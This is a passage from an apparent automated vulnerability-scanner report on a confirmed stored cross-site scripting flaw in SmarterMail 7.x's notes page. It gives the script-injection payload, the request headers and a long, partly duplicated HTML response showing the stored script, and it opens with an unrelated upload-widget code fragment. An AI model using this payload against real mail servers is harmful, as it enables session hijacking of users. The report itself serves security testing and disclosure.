ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});
uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});
uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});
uploader.bind('UploadProgress', function(up, file) {
isBusy = true;
updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});
uploader.bind('StateChanged', function() {
updateList(false);
});
uploader.init();
};
function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";
$.each(uploader.files, function(i, file) {
inputHTML = '';
if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;
var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);
if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});
fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);
fileList[0].scrollTop = 0;
if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();
if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}
return retVal;
}
function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;
if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;
var actionClass = "";
switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}
if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
|
- /Main/frmNotes.aspx
/Main/frmNotes.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| ctl00%24MPH%24txtNote_SettingText | POST | '"--><script>alert(0x009584)</script> |
Request
GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:17:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10711
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFCzU4OCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwxMnwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQScTidPWg+9KYUh0Ketg+uYEqWIg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" name="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" name="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:17:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10711
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFCzU4OCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwxMnwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQScTidPWg+9KYUh0Ketg+uYEqWIg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
